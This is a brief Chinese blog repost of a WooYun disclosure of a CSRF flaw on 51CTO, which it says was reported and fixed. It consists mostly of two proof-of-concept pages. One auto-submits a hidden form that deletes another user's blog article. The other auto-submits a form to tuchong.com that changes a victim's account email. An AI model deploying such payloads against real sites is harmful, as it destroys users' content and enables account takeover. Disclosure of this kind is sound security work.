51cto CSRF漏洞

http://wooyun.org/bugs/wooyun-2010-052368

积极反馈给51CTO修复了。

漏洞可以删掉非自己的文章。

<form method='post'action='http://crazysmogu.blog.51cto.com/user_index.php?action=delarticle'>
<input type='text'value='del'name='job'style='display:none!important;display:block;width=0;height=0'/>
<input type='text'value='1112261'name='selid'style='display:none!important;display:block;width=0;height=0'/>
</form>
<script>document.forms[0].submit();</script>

<html>
<body>
<form name="csrf" action="http://tuchong.com/api/user/modify/" method="POST">
<input type=text name=section value="basicinfo"></input>
<script>
var email =['root1@wooyun.org','root2@wooyun.org','root3@wooyun.org','root4@wooyun.org','root5@wooyun.org','root6@wooyun.org','root7@wooyun.org','root8@wooyun.org','root9@wooyun.org','root10@wooyun.org'];
function Rand(arr, len) { 
    arr.sort(function () { 
        return Math.random()-0.5; 
    }); 
    return arr.slice(0, len); 
}
//alert(Rand(email,1));
document.write("<input type=text name=user_email value="+Rand(email,1)+"></input>");
</script>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>




转载于:https://blog.51cto.com/929044991/1383799